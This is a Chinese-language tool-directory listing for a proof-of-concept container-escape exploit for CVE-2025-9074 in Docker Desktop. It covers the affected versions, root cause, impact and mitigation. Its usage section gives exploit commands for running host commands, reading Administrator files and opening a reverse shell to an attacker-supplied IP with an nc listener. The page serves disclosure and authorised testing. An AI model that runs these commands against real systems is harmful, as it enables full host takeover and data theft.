Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Proof of concept exploit for CVE-2025-9074 - Unauthenticated Docker Engine API container escape affecting Docker Desktop < 4.44.3 on Windows and macOS (CVSS 9.3) | Kitploit
工具/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
容器安全漏洞分析漏洞利用渗透测试云安全红队容器逃逸
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

CVE-2025-9074-Docker-Desktop-Container-Escape

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Proof of concept exploit for CVE-2025-9074 - Unauthenticated Docker Engine API container escape affecting Docker Desktop < 4.44.3 on Windows and macOS (CVSS 9.3)

查看仓库
239个月前尚未审核

CVE-2025-9074:Docker Desktop 容器逃逸 PoC

CVE CVSS Platform

CVE-2025-9074 的概念验证利用程序——Docker Desktop 中的一个严重容器逃逸漏洞,允许未授权访问 Docker Engine API。

漏洞概述

属性值
CVE IDCVE-2025-9074
CVSS 评分9.3(严重)
受影响软件Docker Desktop < 4.44.3
受影响平台Windows、macOS(Linux 不受影响)
修复版本Docker Desktop 4.44.3+
发现者Felix Boulet、Philippe Dugré
发现日期2025 年中
修复日期2025 年 8 月 20 日

技术细节

该漏洞允许在 Docker Desktop 上运行的容器无需认证即可访问位于 http://192.168.65.7:2375 的 Docker Engine API。无论以下设置如何,此问题均会发生:

  • 增强型容器隔离(ECI)设置
  • “将守护进程暴露在 tcp://localhost:2375 上而不使用 TLS”配置
  • 任何其他安全设置

影响

  • Windows(WSL 后端):以管理员权限完全接管主机
  • macOS:容器操纵及潜在后门植入(受限于用户提示)
  • Linux:不受影响(使用 Unix 套接字而非 TCP)

根本原因

Docker Engine API 暴露在容器可访问的 TCP 套接字上,允许:

  • 创建/删除容器
  • 挂载主机文件系统
  • 执行特权命令
  • 完全绕过容器隔离

使用方法

image

前提条件

root@kitploit:~
pip3 install requests

命令执行模式

root@kitploit:~
# 在主机上执行命令
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# 从 Windows 主机读取文件
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# 列出 Windows 上的用户
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

反弹 Shell 模式

root@kitploit:~
# 终端1:设置监听器
nc -lvnp 4444

# 终端2:执行利用程序
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# 连接后,主机文件系统位于:/hostfs

从容器内部使用

root@kitploit:~
# 如果你已经拥有对容器的访问权限
curl http://192.168.65.7:2375/version

攻击场景

root@kitploit:~
graph TD
    A[恶意容器] -->|无需认证| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|创建容器| C[特权容器]
    C -->|挂载主机文件系统| D[完全主机访问]
    D -->|读取/写入| E[危害系统]

缓解措施

需要立即采取的行动

立即更新到 Docker Desktop 4.44.3 或更高版本。

root@kitploit:~
# 检查你的 Docker Desktop 版本
docker --version

# 更新 Docker Desktop
# Windows:从 https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe 下载
# macOS:从 https://desktop.docker.com/mac/main/amd64/Docker.dmg 下载

临时解决方案

如果无法立即更新:

  1. 避免运行不受信任的容器
  2. 监控来自容器的网络连接
  3. 实施网络分段
  4. 在部署前审查所有容器镜像

参考

  • Docker 安全公告
  • NVD CVE-2025-9074
  • Felix Boulet 的博客
  • Philippe Dugré 的分析
  • GitHub 公告

免责声明

本工具仅供教育和授权安全测试目的使用。

  • 仅对你拥有或明确授权测试的系统使用
  • 未经授权访问计算机系统是违法的
  • 作者不对此软件的滥用承担任何责任

致谢

  • 漏洞发现:Felix Boulet、Philippe Dugré
  • PoC 开发:Amanja Francisco
  • Docker 安全团队:快速响应和修复

许可证

MIT 许可证 - 详情请参阅 LICENSE 文件

下载工具